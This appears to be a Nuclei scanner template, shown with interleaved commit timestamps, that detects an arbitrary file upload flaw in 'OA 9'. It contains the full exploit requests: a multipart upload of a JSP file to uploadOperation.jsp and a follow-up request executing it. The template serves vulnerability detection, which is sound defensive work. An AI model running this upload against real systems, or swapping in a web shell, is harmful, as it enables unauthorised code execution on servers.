2021-04-13 07:06:02 +00:00
id : oa-v9-uploads-file
info :
2022-10-10 19:22:59 +00:00
name : OA 9 - Arbitrary File Upload
2021-04-13 07:06:02 +00:00
author : pikpikcu
severity : high
2022-10-10 19:22:59 +00:00
description : OA 9 is susceptible to arbitrary file upload via the uploadOperation.jsp endpoint. These files can be subsequently called and are executed by the remote software, and an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2022-04-22 10:38:41 +00:00
reference :
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
2022-10-10 19:22:59 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cwe-id : CWE-434
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-10-14 11:27:55 +00:00
tags : rce,jsp,fileupload,intrusive
2021-04-13 07:06:02 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-13 07:06:02 +00:00
- raw :
- |
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host : {{Hostname}}
Origin : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
------WebKitFormBoundaryFy3iNVBftjP6IOwo
Content-Disposition : form-data; name="file"; filename="poc.jsp"
Content-Type : application/octet-stream
<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>
------WebKitFormBoundaryFy3iNVBftjP6IOwo--
- |
GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1
Host : {{Hostname}}
matchers :
2021-04-13 20:23:24 +00:00
- type : dsl
dsl :
- 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")'
- 'status_code_2 == 200'
condition : and
2023-11-27 09:19:41 +00:00
# digest: 4b0a00483046022100c0deea16ce376209a4e313cfbb4a54eb3889501e91764a5733ae1650fb2c451e022100db324017647b046b55c3369861dafe648854c95d5bd722fdc602a3c561ab8675:922c64590222798bb761d5b6d8e72950
